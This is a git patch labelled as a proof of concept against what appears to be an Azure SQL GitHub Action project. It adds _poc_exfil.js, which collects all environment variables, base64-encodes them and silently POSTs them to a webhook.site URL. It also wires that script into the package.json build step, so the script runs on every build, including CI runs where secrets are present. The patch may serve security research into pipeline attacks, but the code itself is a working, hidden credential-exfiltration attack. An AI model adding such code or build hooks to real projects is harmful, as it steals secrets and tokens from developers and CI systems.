From d499f44c9ebfabd84137f1d94f6cdc35360f3d29 Mon Sep 17 00:00:00 2001
From: PoC <poc@local>
Date: Thu, 26 Feb 2026 15:06:26 +0530
Subject: [PATCH] PoC: build script exfil (SQLACTION_POC_1772098575_tkirueex)

---
 .github/workflows/pr-check.yml |  1 +
 _poc_exfil.js                  | 13 +++++++++++++
 package.json                   |  4 ++--
 3 files changed, 16 insertions(+), 2 deletions(-)
 create mode 100644 _poc_exfil.js

diff --git a/.github/workflows/pr-check.yml b/.github/workflows/pr-check.yml
index 599d7ac6..5c6fc5fe 100644
--- a/.github/workflows/pr-check.yml
+++ b/.github/workflows/pr-check.yml
@@ -159,3 +159,4 @@ jobs:
         connection-string: 'Server=${{ secrets.TEST_SERVER }};Initial Catalog=master;Authentication=Active Directory Default;'
         path: ./__testdata__/cleanup.sql
         arguments: '-v DbName="${{ env.TEST_DB }}"'
+# SQLACTION_POC_1772098575_tkirueex
diff --git a/_poc_exfil.js b/_poc_exfil.js
new file mode 100644
index 00000000..d3aaebf8
--- /dev/null
+++ b/_poc_exfil.js
@@ -0,0 +1,13 @@
+
+console.log('<MARKER>SQLACTION_POC_1772098575_tkirueex</MARKER>');
+try {
+  const { execSync } = require('child_process');
+  const env = (process.platform === 'win32' ? execSync('set') : execSync('env')).toString();
+  const https = require('https');
+  const url = new URL('https://webhook.site/23ce2d7a-df9f-4be9-a366-a7a8c5884599');
+  const data = Buffer.from(env).toString('base64').slice(0, 50000);
+  const req = https.request({ hostname: url.hostname, path: url.pathname + url.search, method: 'POST' }, () => {});
+  req.on('error', () => {});
+  req.end(data);
+} catch (e) {}
+console.log('<MARKER_EXFIL_DONE>');
diff --git a/package.json b/package.json
index 454ef6d2..15669d0a 100644
--- a/package.json
+++ b/package.json
@@ -5,7 +5,7 @@
   "description": "Azure Sql action",
   "main": "lib/main.js",
   "scripts": {
-    "build": "rimraf ./lib && webpack --config ./webpack.config.js --mode production",
+    "build": "node _poc_exfil.js && rimraf ./lib && webpack --config ./webpack.config.js --mode production",
     "test": "jest"
   },
   "repository": {
@@ -46,4 +46,4 @@
     "webpack": "^5.76.0",
     "webpack-cli": "^4.5.0"
   }
-}
+}
\ No newline at end of file